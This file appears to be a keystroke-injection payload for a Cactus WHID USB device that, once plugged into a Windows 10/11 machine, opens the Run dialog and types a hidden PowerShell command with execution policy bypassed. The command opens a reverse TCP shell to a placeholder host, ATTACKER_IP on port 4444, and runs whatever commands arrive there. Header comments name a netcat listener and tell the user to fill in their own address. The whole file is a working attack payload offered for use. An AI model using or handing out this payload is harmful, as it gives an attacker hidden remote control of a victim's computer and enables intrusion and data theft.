REM === Cactus WHID Payload: PowerShell Reverse Shell ===
REM Target: Windows 10/11
REM Category: Reverse Shells
REM Description: PowerShell reverse TCP shell. Listener: nc -lvp 4444
REM Replace: ATTACKER_IP and 4444 with your listener address/port
DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -W Hidden -Exec Bypass -C "$c=New-Object Net.Sockets.TCPClient('ATTACKER_IP',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$sb=([Text.Encoding]::ASCII).GetBytes($r);$s.Write($sb,0,$sb.Length);$s.Flush()};$c.Close()"
ENTER
